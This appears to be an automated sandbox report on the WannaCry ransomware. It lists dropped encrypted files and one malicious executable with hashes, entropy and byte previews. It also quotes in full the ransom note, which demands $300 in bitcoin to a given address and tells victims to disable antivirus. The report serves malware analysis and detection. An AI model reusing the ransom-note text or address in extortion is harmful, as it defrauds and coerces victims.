                                                                              SHA1:B2ADF39ABDC8576432418FA67C7BA4EFF4F33F3D
                                                                              SHA-256:EDDD41CD155D90EA4A6859F88DB6372F9C1CA212541CB18932F985BAC81A346A
                                                                              SHA-512:5A9AA4E8B4282DFC73BB42F24347B3F99DF36F13584C4E009CAB79A01DF711A7B01D960E5F2ECF9659CD14CD16FAE2AA20E47BC4907FD52F9AC5B01C12A1D98E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....]..../H......7...:..1...x.f.N...B.f.....Ta.yA.*....h..8M...X.W...(XFX...-m{\...pm}B..M......P...d..Yj....c..........~.....".....=U..].n..*.)9p.....KY.....:..vO.,..4....6'..X..Hx...q..s..".h.`.F...b..BW>...[4+..........R...-]....T.)m...l".L................x..D..6..=..|.Di....x..C.:.<0...^.d....OM..Fg+.P...&.).."K&9..(.!r.1D........<..k..@2Y.e...Z..]i.-..Y..U.].:... .&CsD.*......'.....15Q...yh.p.Zp.h..E.I..K.,n8...@S....*b.;.....a$.....p.I....C..9..T....f=....._.D..+...b{C..r."xc.fK'...^4..8..r.eL.MM.-..l)CT......u..v..)T.yb.E..Ms.FP._ZV..&....i.8...^..)...1.~.~.D9W.3Yf?H{,.....P..uKd.k.8J..$=.e...`...o.. m.m(.......3.....)U3.s.eg.Ja......r.....7..Dwki......C.".v.X..g.viL.)Z...n....d:..-.M......o....{.[...{?....Y..<s......[s.a.sph?X...|...}..U!.I-).g0~ ....`S....m?..LuH'..,....S..G.w'R.._0..~d...;....3;.....e(.]...N.!K..c....X..X_.._.....i'.f.`.k............R.[....&....3.J.B[3...$.|...(...j'.6...D....4LZ.4.$..S.S......*....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852693470687874
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9SmndOQ/vunWYDRbTEskMANbWC16J8r1VmjuwH/e8UFY1XsrqBNz:bkkmndOQnoWYcsk9bWx8ap5eyT
                                                                              MD5:2D89B0E31872C45378863F34F6610D39
                                                                              SHA1:B2ADF39ABDC8576432418FA67C7BA4EFF4F33F3D
                                                                              SHA-256:EDDD41CD155D90EA4A6859F88DB6372F9C1CA212541CB18932F985BAC81A346A
                                                                              SHA-512:5A9AA4E8B4282DFC73BB42F24347B3F99DF36F13584C4E009CAB79A01DF711A7B01D960E5F2ECF9659CD14CD16FAE2AA20E47BC4907FD52F9AC5B01C12A1D98E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....]..../H......7...:..1...x.f.N...B.f.....Ta.yA.*....h..8M...X.W...(XFX...-m{\...pm}B..M......P...d..Yj....c..........~.....".....=U..].n..*.)9p.....KY.....:..vO.,..4....6'..X..Hx...q..s..".h.`.F...b..BW>...[4+..........R...-]....T.)m...l".L................x..D..6..=..|.Di....x..C.:.<0...^.d....OM..Fg+.P...&.).."K&9..(.!r.1D........<..k..@2Y.e...Z..]i.-..Y..U.].:... .&CsD.*......'.....15Q...yh.p.Zp.h..E.I..K.,n8...@S....*b.;.....a$.....p.I....C..9..T....f=....._.D..+...b{C..r."xc.fK'...^4..8..r.eL.MM.-..l)CT......u..v..)T.yb.E..Ms.FP._ZV..&....i.8...^..)...1.~.~.D9W.3Yf?H{,.....P..uKd.k.8J..$=.e...`...o.. m.m(.......3.....)U3.s.eg.Ja......r.....7..Dwki......C.".v.X..g.viL.)Z...n....d:..-.M......o....{.[...{?....Y..<s......[s.a.sph?X...|...}..U!.I-).g0~ ....`S....m?..LuH'..,....S..G.w'R.._0..~d...;....3;.....e(.]...N.!K..c....X..X_.._.....i'.f.`.k............R.[....&....3.J.B[3...$.|...(...j'.6...D....4LZ.4.$..S.S......*....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789345259246237
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSYQKwlKzaFzbq5wf9Z/JlegM3qE7SqW4yzy:TZ7yef/yRqaSqPyzy
                                                                              MD5:F6DC3C5F776D9BCB748213EF1FB41E2F
                                                                              SHA1:AF529235FA54ED2EA06702C74C8BFAA8B474779D
                                                                              SHA-256:B803CDA45224DDF90585E301C7715AE4ACECAB5E65FB8FC0AD86759D6858DE01
                                                                              SHA-512:771E94AAD4F546066D5773C5F60C6E98CF00446D8BE6AEB39A3C5C9DAA0FB8B10DE80F4D764D0AA83B87BE680FFD1386CB0B1D3729EE13BE545341037DC2C009
                                                                              Malicious:false
                                                                              Preview:I.).1.+Sc.E..C.r.B..#H"o.w..+x]K.....i..4.7A0u..-d...l......8H...&..... ...BG.:<..Z.....qcfc..Dn.,c{3..8&.S.......r.Z\...f.x8.$.. \5... f..i.u..n@z..."...!.VwT.....V=...\I.C$P.j.3.T.{f.n...}IDP.q6.......S..%.....5.TWz@f.....tm...g.....'VA!.......W.i.&..Y`....D.........?J.:6...oc{(....w...C...M..[B.:g..X....j...J%a...T.l(..|...B...}U..+.....H...j...J.q...f&\3..#.U2. .!}l7.d..O.%....NEC3(..`.. . ........5w..yf.GaI..)....I..v.R....D.....I.0....^lb..cJ^.~......>....o..|..Z#ZQ....2.._..1....f0L.h3..7.-....]t.[s.%....X.si!.....w....xI_.h......D-\.G....L..5..[Om.M.M$....a8d.$...c...O...p..O..TZ.b.R.K........%ANjZ*Y'`..N....8..v.U.3..>.Ku/T. .o......7L..r.....F..lb^K...VLg..Wt.O.@.{..=Z..$. 9..n..y.....y.....nQt..o.....v.=.!G.m......p.....!{.o.\..'.....1.y..f...G&..cs"f...7FL..w...eb..#.~f.~...`Ua.0.f....i.`.C...\..o.../.'..~.Bn...b..n.....!..1...<..H.)}g...6.>..2...#vbz.X.u(t.0..#.W6m)...R....b.,...H0.R...A.!"2U.....!Z......5...f*5....#).l...L..V.|I
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850852472768536
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1fWf+mq9It6Z/NaiTPnIm8xUellBSjyVbosCUwe0rIS2s2xfKD67M:bk1VIwxN7jncx3lHSjyVbosCUwnrISl1
                                                                              MD5:433ADB6740A9A691712862838F1A66F6
                                                                              SHA1:7F13C249623DC8201717E7A03D93F7D3BB246140
                                                                              SHA-256:D735AA15516C109F7F93C18B45A06729AC5A6DC55447592CA1ECC12FACD5AF8A
                                                                              SHA-512:A11B503D4EBEF1E547F01E6D4AED48C1F2107E6E336D0D9EE2C79D896242F33751C1761B5A3F4B48DF7FA14BAEBF57B123AEFC3B725A84AF8738FE8EA5696E1B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c..M...0p....zUZ..ni^y.I.vG........d7.'(`.lL.`jN*.h..'..........dj4.xU..n)..n....'......j...pQ.b..)....@...x..H2.0..X&..A6Q..,s......O<0.v\@.4G....<....t,.$Zk...........0S..ly~..%-...&......A..|.H@..%Stu,b.1....H..H.g...*.....P@.};..d7.,N....1r.............7w9.Ap..... .+.0Ga..:..w.au.i......1qH.....f..u....h.......................(. .D{Q.3K...n.].....v.T.Y....^I...m...8.....+.....(W+.=...GZ..^....E..0..b.....(.N}.. ..d.<.2X.|.s..,......%..p.(..m..+!.@...;Q...17..j..\.....$l......=.E(r....... .^..N..h..._....A.R.`..w.4~...6..o.&..[H.sT. ...>d..#T....K....4..vj....L....I.@........Y.....n..-=.X,....@_R.......r$..).nu$...O....t.~..........{u:..i.!...@...@.Nai_q,c.B..hI....x....7>o+.....;..;....;...#I....7.f.m.i.dz..W.A..6.wG.;....2m.oJ..;....\).D(O....N4..f....,60.....H..].NS.zbrm.....b."r.M.P.)^hC....R..M`?&.i....yY..v!..aTooO..x....%.w.*....-..7..g....tO...........YD.E.P.&.....>$.....k.#B..+y..Am.49iw... F.O....)...j..o.=..'w.>..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850852472768536
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1fWf+mq9It6Z/NaiTPnIm8xUellBSjyVbosCUwe0rIS2s2xfKD67M:bk1VIwxN7jncx3lHSjyVbosCUwnrISl1
                                                                              MD5:433ADB6740A9A691712862838F1A66F6
                                                                              SHA1:7F13C249623DC8201717E7A03D93F7D3BB246140
                                                                              SHA-256:D735AA15516C109F7F93C18B45A06729AC5A6DC55447592CA1ECC12FACD5AF8A
                                                                              SHA-512:A11B503D4EBEF1E547F01E6D4AED48C1F2107E6E336D0D9EE2C79D896242F33751C1761B5A3F4B48DF7FA14BAEBF57B123AEFC3B725A84AF8738FE8EA5696E1B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c..M...0p....zUZ..ni^y.I.vG........d7.'(`.lL.`jN*.h..'..........dj4.xU..n)..n....'......j...pQ.b..)....@...x..H2.0..X&..A6Q..,s......O<0.v\@.4G....<....t,.$Zk...........0S..ly~..%-...&......A..|.H@..%Stu,b.1....H..H.g...*.....P@.};..d7.,N....1r.............7w9.Ap..... .+.0Ga..:..w.au.i......1qH.....f..u....h.......................(. .D{Q.3K...n.].....v.T.Y....^I...m...8.....+.....(W+.=...GZ..^....E..0..b.....(.N}.. ..d.<.2X.|.s..,......%..p.(..m..+!.@...;Q...17..j..\.....$l......=.E(r....... .^..N..h..._....A.R.`..w.4~...6..o.&..[H.sT. ...>d..#T....K....4..vj....L....I.@........Y.....n..-=.X,....@_R.......r$..).nu$...O....t.~..........{u:..i.!...@...@.Nai_q,c.B..hI....x....7>o+.....;..;....;...#I....7.f.m.i.dz..W.A..6.wG.;....2m.oJ..;....\).D(O....N4..f....,60.....H..].NS.zbrm.....b."r.M.P.)^hC....R..M`?&.i....yY..v!..aTooO..x....%.w.*....-..7..g....tO...........YD.E.P.&.....>$.....k.#B..+y..Am.49iw... F.O....)...j..o.=..'w.>..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.825747547187061
                                                                              Encrypted:false
                                                                              SSDEEP:12:3xj5QnwsGLCt+MujyPWjcCNSOwBcVcH1ST02NsJo0ThlzTH/vQwVWkb9enFu28XA:3DQ5fAjyW/wBcVs1HomlvgmX20beUgkA
                                                                              MD5:49ACD1181D3FB2F6A36796BF64FC3A5C
                                                                              SHA1:D5F6BF125E4CCD34C682567318966CB9070C3631
                                                                              SHA-256:4DFE38D26E9371685981376567457210E64F07470B4C5F4D2F972BC052B0AC26
                                                                              SHA-512:C24A3DDA7AE2507578C735008E8DCACC5D19599534E75C86E19C3A4D7F4A9C89C08DC10658BE0C91C9370B99032D3B71E8FB92F4DCA351503A1008BD1EF7112B
                                                                              Malicious:false
                                                                              Preview:t?.,!...18-.f0.........j,td...5[..,.f.F!D..4hx...tU..<.;....."n..t.........5.F..&p...y h...q7DI..A`.*[*....w.%.....=u.B.`f....sE1...{F..._K...u.@.nY.h..-.3A.+!..+..'#..V.>7.*..Wf.`...i`.%.N.$Wa...zC..j.4t$.f......,E{..du.#.t}f..3a....(..j..YdK~.....-.P............^.#..u.{.....m.xL.j..O..?..&LT?.Q..1.0...S..[a..E.H......w..j.)...>....+U^...u.]l.6I...".!].Q<.B.%.^Z.t...L...x=r..9.(D.0.)...&...c...?.j.=d$t..D..?..'.hm.(*)oGA..T.9l....zJ...1...q...'......._.B.^.=Z..p.z.bcN.](.....WF:..L......m.Z./J6L....{..gyQf....n..7..-.k7.."...n.....'....M...<b...X..C.>.....z...W.....<...?{......*..]..~..-.\...3..GT...........j....xx(J.....g._./q...G..<..K..g.]k*..R<(z'....F..?G..;.O...{..k.~H.v.1....N#9....'...F.%.@.......JIiwP...S....J.U..i..p...../.gg.o++.0s.O...tV.M|...J.t,..;....=...j...F@..WP}^Um....A.....>.u....,.:JK.Mld.-....e..>....,.]..."Ba.i...C.{..D....yB..{S.q...C.`..Fb.4..9d....F..m.*...Nt.ickbAU....a.$..W...j..Tm.t..8......E.Th....Y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.869295409877953
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/GtvNJXZi7RXICRHTJ5WrsErDgey4DXD1AUmX3B5aMtiziq3yXmcg:bk+tA7VNhXEfUiXDGBltmDeXg
                                                                              MD5:3B0E76786C4CE5A34B1C6D6ADA3A88FA
                                                                              SHA1:4AF95C9019DF850F3F39A81FB48DA71D32211D48
                                                                              SHA-256:68A73D2D327E8ED25F77F61C310C6053D3278CAD38D26354F4D488CB8C998D42
                                                                              SHA-512:6EBCD4703303A06436336459CCEA28DD63CB6D93933022DFCB43EDE6A2F1CEF822C4FEF41C48F3EF1262943366ECED277A2FD20C27683CA905B56DE473C85A67
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....&9y@...Y..LU.......... ...............f..[.:...Y.....mF.....XZx.........p.O...q................).f....^<.......=..<.=..z...X....{q.B..+.w.|.*v.p..6...._.Q:D!......=f...6.<3z..N.P.4...]c.....kx....hJF..F.._..d.9.....r8. ....GV.....y.3................h.b..^.2<>O......%....&%...U....,j...x...l...LB.fCmd.8f..'.j."..+.....q/\.P..z.!...5M].-...t...XB.s.@....PC.i5Bj.v.k=.`c....e.......1.Q... ......kg.X,.5[...c...-q...ZSx[mq.,........% .6.T.J.H.....*..Tn[......)..7_m...L.........3h#.....02.........)g..*@}~.``!G...H1...6.R.......J%6..h4..C.n.SO.._...............g..E.....hy;....F.]Ot..|'A......y2j]#.....P1.teQ+...UI.i....#..."..sh...9..H..:..v..t..>#.r^:...aJE[.VA..M...:.L...T..............J.t..)G....J~v.2....%|..f_sI.n..Yz1N.o ...x..m&....nz.4.l....y......$A..1N.g...0..vI...!.V...%.)!..#9~.......R...B.s.MM.e%....D...d".....>?.8D......^?S...u....rA..I.......KOU..;g.Ht..h.1.i...o.l.2.f............8.......X."....N..kW..}.:C<-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.869295409877953
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/GtvNJXZi7RXICRHTJ5WrsErDgey4DXD1AUmX3B5aMtiziq3yXmcg:bk+tA7VNhXEfUiXDGBltmDeXg
                                                                              MD5:3B0E76786C4CE5A34B1C6D6ADA3A88FA
                                                                              SHA1:4AF95C9019DF850F3F39A81FB48DA71D32211D48
                                                                              SHA-256:68A73D2D327E8ED25F77F61C310C6053D3278CAD38D26354F4D488CB8C998D42
                                                                              SHA-512:6EBCD4703303A06436336459CCEA28DD63CB6D93933022DFCB43EDE6A2F1CEF822C4FEF41C48F3EF1262943366ECED277A2FD20C27683CA905B56DE473C85A67
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....&9y@...Y..LU.......... ...............f..[.:...Y.....mF.....XZx.........p.O...q................).f....^<.......=..<.=..z...X....{q.B..+.w.|.*v.p..6...._.Q:D!......=f...6.<3z..N.P.4...]c.....kx....hJF..F.._..d.9.....r8. ....GV.....y.3................h.b..^.2<>O......%....&%...U....,j...x...l...LB.fCmd.8f..'.j."..+.....q/\.P..z.!...5M].-...t...XB.s.@....PC.i5Bj.v.k=.`c....e.......1.Q... ......kg.X,.5[...c...-q...ZSx[mq.,........% .6.T.J.H.....*..Tn[......)..7_m...L.........3h#.....02.........)g..*@}~.``!G...H1...6.R.......J%6..h4..C.n.SO.._...............g..E.....hy;....F.]Ot..|'A......y2j]#.....P1.teQ+...UI.i....#..."..sh...9..H..:..v..t..>#.r^:...aJE[.VA..M...:.L...T..............J.t..)G....J~v.2....%|..f_sI.n..Yz1N.o ...x..m&....nz.4.l....y......$A..1N.g...0..vI...!.V...%.)!..#9~.......R...B.s.MM.e%....D...d".....>?.8D......^?S...u....rA..I.......KOU..;g.Ht..h.1.i...o.l.2.f............8.......X."....N..kW..}.:C<-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):245760
                                                                              Entropy (8bit):6.278920408390635
                                                                              Encrypted:false
                                                                              SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                              MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                              SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                              SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                              SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841203706047752
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8Rq6BMP8dKPzbr5HeU7QJZh5xGf2yX0ioxxyO67kDj3OrytsCoy0nhl8Mot:bksPBM+Kb3SZPxGuykilkDjerotoZARt
                                                                              MD5:B0548A2D738171D338B2F27F7DE952DA
                                                                              SHA1:E3CEB439371BCB8D33645ECCD938AA98595C386D
                                                                              SHA-256:537A220B2196461A6660B9ED7DBF873F05B510DEEDB4095CFDE864920D9E7502
                                                                              SHA-512:B9B12824CCBC2A948F7EF36E23FA32ABE422BD3CACEA44E3F34908873B638CAF376E543A32DCBFA1586ADC66C5F0CD2D8F319A5FD0907B48BC82D9D436A98846
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....b...p2.U...G1.Hu...#?u..J......}.(_......aOb...w|;...D.a.i...9.../t./..a.lP^/1..z..9v...).O4V...+.A_rYe.f.k..&.C.!..^..>X.go+A..V..o.e6......y@m|..:*L.-.G.b.5.`R. .5...U`..$...E.5..Dbao........|K..N?%..H.....o.......G.h..U. 2........y....f.K..............L........\6:../J.=.o.s.p$.,.A.aC-....z^z...1...%.h{......<...v.[/G.4&}...cEQ....p....'....h.......a...5.........d.f...W.F....G%j..0?....X.B.....6qp.../.Z.w-.B...6..J...-r.!p.Z}>.F....I..`.....T......}+*s}...T..-.g^..w~zb.`..........k..]C1.".t..:X%.<.._-....;...K......0.'..9../..[>@b'...T1V.L,.Yw9...y_....+_..@.N>}0<...&.t7..u(..h|%8%..>..b.f1(h.#(.aJ.CZ.qh!.,"..(......,..'.n..~......s..........`...d.!94~.:.|.@..!.DK...K../...}?}......p.2...>.....>U.p..(..L;...a.L..5.....%.....N.....]>..@..<.C.V........w..r<.T..>....'k=.V1...~o..G...[("....i......7.4...}.]._6.......N....,C.>h._$.$I. ...h*..~=/.u......a.y..V....t.~..~.[f.eE;i#)......%.....+...?..#0.}....D......D..R.N."M.S3.5$.*.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841203706047752
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8Rq6BMP8dKPzbr5HeU7QJZh5xGf2yX0ioxxyO67kDj3OrytsCoy0nhl8Mot:bksPBM+Kb3SZPxGuykilkDjerotoZARt
                                                                              MD5:B0548A2D738171D338B2F27F7DE952DA
                                                                              SHA1:E3CEB439371BCB8D33645ECCD938AA98595C386D
                                                                              SHA-256:537A220B2196461A6660B9ED7DBF873F05B510DEEDB4095CFDE864920D9E7502
                                                                              SHA-512:B9B12824CCBC2A948F7EF36E23FA32ABE422BD3CACEA44E3F34908873B638CAF376E543A32DCBFA1586ADC66C5F0CD2D8F319A5FD0907B48BC82D9D436A98846
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....b...p2.U...G1.Hu...#?u..J......}.(_......aOb...w|;...D.a.i...9.../t./..a.lP^/1..z..9v...).O4V...+.A_rYe.f.k..&.C.!..^..>X.go+A..V..o.e6......y@m|..:*L.-.G.b.5.`R. .5...U`..$...E.5..Dbao........|K..N?%..H.....o.......G.h..U. 2........y....f.K..............L........\6:../J.=.o.s.p$.,.A.aC-....z^z...1...%.h{......<...v.[/G.4&}...cEQ....p....'....h.......a...5.........d.f...W.F....G%j..0?....X.B.....6qp.../.Z.w-.B...6..J...-r.!p.Z}>.F....I..`.....T......}+*s}...T..-.g^..w~zb.`..........k..]C1.".t..:X%.<.._-....;...K......0.'..9../..[>@b'...T1V.L,.Yw9...y_....+_..@.N>}0<...&.t7..u(..h|%8%..>..b.f1(h.#(.aJ.CZ.qh!.,"..(......,..'.n..~......s..........`...d.!94~.:.|.@..!.DK...K../...}?}......p.2...>.....>U.p..(..L;...a.L..5.....%.....N.....]>..@..<.C.V........w..r<.T..>....'k=.V1...~o..G...[("....i......7.4...}.]._6.......N....,C.>h._$.$I. ...h*..~=/.u......a.y..V....t.~..~.[f.eE;i#)......%.....+...?..#0.}....D......D..R.N."M.S3.5$.*.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8167365313983845
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkagvMruDVU0pkW5M7PLV+ZoB0zKrfIy5/QL4lp:bkawVLqP4Z60z2NCO
                                                                              MD5:E3405FC9B78A1D4533CFEE86E6114041
                                                                              SHA1:A3EA35350DE1CFF7ED1F38155EA8A722B8FC5C0F
                                                                              SHA-256:DF04B9ECB74CB736599C38BEE44EC752F80E44FFB382E6472351833286C9FE22
                                                                              SHA-512:8E3FB9CACF97FC19624EA2F182EFADACE782E8D5070613400B84D9BCEC885DE1BF280924DC1A2345AF7DDC270F7BE13D60CFDAC79E5EB277C94B0C76C73D52AD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....W...T......*.0.ms...Y.y.Pm....#X.6.L.k..y..W..k..6....FVo..+..Y.25[...,R=.wQ-H............|,...*.ui....)..fN.Z.g.3..RN...Ml.x.w.-.cSA..z....`.].7]....m[...\@@.~I.?...`...%.L3..Q...aq.w.M&.<.:O..=9?-.b....+(.1......7&PW..A{....-x...s.S.~..Dw..g............)......2W....,.G.b......k.......(.Nk...Y..Fb.x.....$..p..p..9.n..>1...fuS...5.C..d.sF7....c...o%.oO.b.7,.>..>X.i...($....JR!y....C....U.m..[..<.cI..6.,J*.C..yKC2o.Y.BR...t.}X.N.F...G.?.!.u...#....(....".ESw...W.0.&.. ..b...lt..c.].....F.{.\Q....bvO..WR.x.O...N...q.~.D.>..^r.w...b..b.M[n.=.dz....2..E....u..X..x.k.....t.~...qU\]*..*.t.{..=..7.C.|^?+Fw._.pV..0-sbtp.......6.......\...beXRo..I9..h..1S..j..+..~nf3...d.0w.46.M?RB._E7Q.R..D..|R......._..,...%...P...GZ..J....Cm....S.}7......B......U.....%.]...lA.......`.Pq.....+..Z.e.]t@s.....t.YEK.l......s6..R..)..............7.`..g..7'y......Q.i.W).+2q..."..../..ii.?.`...2....>.....5^K.9.'.^S.........-p.YWF.2.'...N.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8167365313983845
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkagvMruDVU0pkW5M7PLV+ZoB0zKrfIy5/QL4lp:bkawVLqP4Z60z2NCO
                                                                              MD5:E3405FC9B78A1D4533CFEE86E6114041
                                                                              SHA1:A3EA35350DE1CFF7ED1F38155EA8A722B8FC5C0F
                                                                              SHA-256:DF04B9ECB74CB736599C38BEE44EC752F80E44FFB382E6472351833286C9FE22
                                                                              SHA-512:8E3FB9CACF97FC19624EA2F182EFADACE782E8D5070613400B84D9BCEC885DE1BF280924DC1A2345AF7DDC270F7BE13D60CFDAC79E5EB277C94B0C76C73D52AD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....W...T......*.0.ms...Y.y.Pm....#X.6.L.k..y..W..k..6....FVo..+..Y.25[...,R=.wQ-H............|,...*.ui....)..fN.Z.g.3..RN...Ml.x.w.-.cSA..z....`.].7]....m[...\@@.~I.?...`...%.L3..Q...aq.w.M&.<.:O..=9?-.b....+(.1......7&PW..A{....-x...s.S.~..Dw..g............)......2W....,.G.b......k.......(.Nk...Y..Fb.x.....$..p..p..9.n..>1...fuS...5.C..d.sF7....c...o%.oO.b.7,.>..>X.i...($....JR!y....C....U.m..[..<.cI..6.,J*.C..yKC2o.Y.BR...t.}X.N.F...G.?.!.u...#....(....".ESw...W.0.&.. ..b...lt..c.].....F.{.\Q....bvO..WR.x.O...N...q.~.D.>..^r.w...b..b.M[n.=.dz....2..E....u..X..x.k.....t.~...qU\]*..*.t.{..=..7.C.|^?+Fw._.pV..0-sbtp.......6.......\...beXRo..I9..h..1S..j..+..~nf3...d.0w.46.M?RB._E7Q.R..D..|R......._..,...%...P...GZ..J....Cm....S.}7......B......U.....%.]...lA.......`.Pq.....+..Z.e.]t@s.....t.YEK.l......s6..R..)..............7.`..g..7'y......Q.i.W).+2q..."..../..ii.?.`...2....>.....5^K.9.'.^S.........-p.YWF.2.'...N.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848881927922129
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkJZXedobhMS6DhBzj8rRlemPDYV1m0aDK7N/dDLqT2vaKvHY4aYH8wY4fd:bkJU7BgleMgmDENF2QPw+39
                                                                              MD5:60194039C4F7935989BCBABC84BE3063
                                                                              SHA1:CB7A31A367C05BA7393A84239514A6998E0CA04B
                                                                              SHA-256:E82ECBD16B46E5825D62BABC0D9B00F1457CF78DA5E9E670290C065B4256AA55
                                                                              SHA-512:5EA802EA6616208357B79F91B0E641EDDE808463F7557A76ED4A8054B364FDE34BCEA85CDDCC4779B3BA9EE5B8FF279C3BE0B4F18AB49A2A7FF881C9A2CCF9B0
                                                                              Malicious:false
                                                                              Preview:WANACRY!......hCBD.<h?.q.t..GN.:V7..._...0.n4..p..1d.Mhw..).=..........Uo.(..C.$..0....V.....Y.N....t.1...dQ.B=...6..DAH.x...v...C...v..V..twm..Oa......42..@S8...J.sM..?...Y.[.....T.@{[.S`BU.c@...g.#..kf..g.xB'5.RgWQ..k..+.g}\.g=..<..<a.}......X....@eM..9..............?Y$/~.~..WP*]<".X$...@GE...\.Y.V?#n.T.....eMht.u..n.0...........v._..f.....}_.x!.....H`.QYBY..~y.Y.x.O.o..?]I.=....+.T...g.*.w.k-...Pt.On.`...r.7.hYX.e}#...b_.K...D9*....zg..AS...NY.L..Ju.]...D..{...?.p.)]..U.[...Q.y..f.|.>0..!'.4U.>..1v.vp..z...+.G....!..;{j..D..>.;.5.............V.....Tu<e.]....=..'.. ..=.>.."TQuw....2.I/i3...r&.J....(.U.F.U.....oZf..U..m.....8...d....;.....S].....w...b4tz.../.3.........8J.p......=..dh.....m.{....D..9.86..t.n....o...'.3....S..UT.Ct...W.Gl.a.....Ld.{.WK.JB..>S2.=...2S......MG.An..p....X.|RK........vy..d...J./..0...jzA..2......:..w......o7.)......j.W..a.....m..05.._....q.N.......DA..p>.V...H...k6.2K9k,.|..I..T..F.u J].]....d..g5...w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
